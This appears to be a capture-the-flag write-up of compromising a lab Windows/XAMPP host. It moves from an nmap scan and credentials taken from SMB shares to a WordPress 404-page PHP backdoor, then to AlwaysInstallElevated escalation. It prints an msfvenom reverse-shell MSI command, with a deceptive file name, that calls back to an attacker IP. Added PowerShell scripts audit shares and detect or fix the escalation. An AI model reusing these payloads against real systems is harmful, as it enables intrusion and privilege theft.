Getting started:
According to the plan I wouldn't have reached this box until Sunday, but a veteran told me I could do it early, so naturally its priority got bumped. Same routine as always: scan the target's open ports and do a quick analysis. Port 21 can be skipped, since there's no hint of anonymous access. Port 80 is worth a look: there's a web service, and we'll probably need to brute-force directories. For 135, 139 and 445, go straight to smbclient and check whether any shares are accessible. 3306 is off the table without a username and password.
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd 0.9.41 beta
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was http://192.168.51.55/dashboard/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
| http-title: Welcome to XAMPP
|_Requested resource was https://192.168.51.55/dashboard/
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
3306/tcp open mysql?
| fingerprint-strings:
| NULL:
|_ Host '192.168.49.51' is not allowed to connect to this MariaDB server
5040/tcp open unknown
7680/tcp open pando-pub?
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.94SVN%I=7%D=3/26%Time=67E37155%P=x86_64-pc-linux-gnu%r
SF:(NULL,4C,"H\0\0\x01\xffj\x04Host\x20'192\.168\.49\.51'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 10 1909 (95%), Microsoft Windows Server 2019 (95%), Microsoft Windows Server 2008 SP1 or Windows Server 2008 R2 (92%), Microsoft Windows 11 21H2 (91%), Microsoft Windows 7 (91%), Microsoft Windows 10 1709 - 1909 (90%), Microsoft Windows Server 2008 SP1 (89%), Microsoft Windows XP SP3 (88%), Microsoft Windows 10 (88%), Microsoft Windows Server 2008 R2 or Windows 8.1 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-03-26T03:18:15
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
TRACEROUTE (using port 445/tcp)
HOP RTT ADDRESS
1 0.27 ms 192.168.49.1
2 1.15 ms 192.168.51.55
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.79 seconds
Visiting port 80 shows a PHP stack, so PHP backdoor execution and the like may come into play; worth keeping in mind. Beyond that there are no other features, not even a login page, and directory brute-forcing turned up neither a login interface nor anything else interesting. Note that I confirmed this with a big 200,000-entry wordlist, so I assumed the key wasn't in the directories (this turned out to be foreshadowing).

Then I turned straight to the SMB shares. I was thinking that if there was nothing here the box was probably a lost cause, but there were some interesting files.

Downloaded them all without hesitation. The interesting ones were the first two files, which contained a pile of login credentials. Going through them, the only one I couldn't confirm was the WordPress one, so I guessed a WordPress service existed. It was odd that the directory brute-force above hadn't found it.
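The share review above is done from the attacker's side; the same finding looks like this from the host's side. The script below is an added example, not code from the original writeup: run on the Windows file server, it lists non-administrative shares that any network user can read and flags files under them whose names suggest stored credentials. It assumes the built-in SmbShare module (Windows 8 / Server 2012 and later) and an elevated prompt; the principal list and file-name patterns are my assumptions, not values from the page.

```powershell
# Added example (not from the original writeup): audit SMB shares for broad read access
# and credential-looking files. Run from an elevated PowerShell prompt.

# Principals whose presence on a share ACL means "anyone on the network can read this".
# Assumed list; adjust for your environment.
$BroadPrincipals = @('Everyone', 'ANONYMOUS LOGON', 'Guest', 'Guests', 'Authenticated Users')
# File-name patterns that often carry secrets (assumed patterns, extend as needed).
$SecretPatterns  = @('*pass*', '*cred*', '*login*', '*.kdbx', '*config*.php', 'wp-config*')

# Skip special shares (C$, ADMIN$, IPC$); they are admin-only by design.
$Findings = foreach ($share in Get-SmbShare | Where-Object { -not $_.Special }) {
    $broad = Get-SmbShareAccess -Name $share.Name | Where-Object {
        $entry = $_
        $entry.AccessControlType -eq 'Allow' -and
        ($BroadPrincipals | Where-Object { $entry.AccountName -eq $_ -or $entry.AccountName -like "*\$_" })
    }
    if (-not $broad) { continue }

    # Files under a broadly readable share whose names suggest stored credentials.
    $suspect = Get-ChildItem -Path $share.Path -Recurse -File -ErrorAction SilentlyContinue |
        Where-Object { $name = $_.Name; $SecretPatterns | Where-Object { $name -like $_ } }

    [pscustomobject]@{
        Share        = $share.Name
        Path         = $share.Path
        BroadAccess  = ($broad | ForEach-Object { "$($_.AccountName):$($_.AccessRight)" }) -join ', '
        SuspectFiles = ($suspect | Select-Object -ExpandProperty FullName) -join '; '
    }
}

$Findings | Format-List

# Remediation for a share that should not be world-readable, e.g.:
#   Revoke-SmbShareAccess -Name <ShareName> -AccountName Everyone -Force
# and move any credential files out of the share entirely.
```

The two conditions that made this box fall, a share readable without meaningful authentication and plaintext credentials stored inside it, show up as one row each in the output; either one on its own is a finding worth fixing.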

With no other option I asked someone, and his directory was called shenzi. I honestly can't believe the big wordlist didn't include it. Then I logged into WordPress with the credentials from above.

The usual trio: plugins, PHP pages, plugin versions. I tried inserting a PHP backdoor into a PHP page first, because that's the simplest to pull off. A quick look confirmed we have permission to edit, so I inserted it into the 404 page without hesitation; I've put the link to the backdoor construction at the end.

Then we just visit it under that directory.

And here we successfully got a shell.

Then we upload winPEASany and enumerate. It turns up an NTLMv2 hash, but that was useless: it wouldn't crack, and even if it had, it wouldn't have mattered. I was just killing time.

The key finding is AlwaysInstallElevated. What does this mean? It means that as long as you upload a crafted MSI backdoor, you can directly get a shell with administrator privileges.

Here's the construction; just copy it, no need to go into detail.
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.180 LPORT=443 -f msi > BonusCompensationPlanpdf.msi
After uploading, just run the MSI and you'll receive an administrator shell.

Here we successfully obtained an administrator-level shell. Perfect finish.
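For the privilege-escalation step above, this is the check and fix an administrator would run on the host, plus the log query that would have caught the MSI install. It is an added example, not code from the original writeup. The policy is only abusable when both the machine value and the user value are 1, which is exactly the condition winPEAS flags; the registry path and the MsiInstaller event IDs are real, the path regex for "MSI launched from a user-writable folder" is my assumption.

```powershell
# Added example (not from the original writeup): audit, remediate and detect
# AlwaysInstallElevated. Run from an elevated PowerShell prompt.

$KeyPath = 'Software\Policies\Microsoft\Windows\Installer'
$Hives   = @{ Machine = "HKLM:\$KeyPath"; User = "HKCU:\$KeyPath" }

function Get-AlwaysInstallElevated {
    $state = @{}
    foreach ($hive in $Hives.Keys) {
        $value = Get-ItemProperty -Path $Hives[$hive] -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        # A missing key or value is the secure default (0).
        $state[$hive] = if ($value) { [int]$value.AlwaysInstallElevated } else { 0 }
    }
    [pscustomobject]@{
        Machine     = $state.Machine
        User        = $state.User
        # Windows Installer only runs packages as SYSTEM when BOTH values are 1.
        Exploitable = ($state.Machine -eq 1 -and $state.User -eq 1)
    }
}

function Disable-AlwaysInstallElevated {
    foreach ($path in $Hives.Values) {
        if (Test-Path $path) {
            Set-ItemProperty -Path $path -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
    }
}

# Caveat: HKCU here is the hive of the account running this script. To audit the
# setting for another user, load that user's hive or check the GPO that sets it.
$status = Get-AlwaysInstallElevated
$status | Format-List
if ($status.Exploitable) {
    Write-Warning 'AlwaysInstallElevated is 1 for both machine and user: any MSI a standard user runs installs as SYSTEM.'
    Disable-AlwaysInstallElevated
}

# Detection: Windows Installer writes to the Application log under provider MsiInstaller.
# Event 1040 ("Beginning a Windows Installer transaction") carries the package path,
# 1033 records the installed product. A package launched from Downloads, AppData, Desktop
# or a Temp folder is the pattern from the escalation above (assumed regex).
Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'MsiInstaller'; Id = 1033, 1040 } `
    -MaxEvents 200 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match '\\(Users\\[^\\]+\\(Downloads|AppData|Desktop)|Temp)\\' } |
    Select-Object TimeCreated, Id, Message
```

If the policy is delivered by Group Policy, clearing the registry values locally only lasts until the next policy refresh; the durable fix is to disable "Always install with elevated privileges" in both the Computer and User Configuration halves of the GPO.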

Summary:
An interesting box, worth a look. Pay attention to the directory brute-forcing twist, and the privilege-escalation point is worth a look too; otherwise nothing special. Medium difficulty.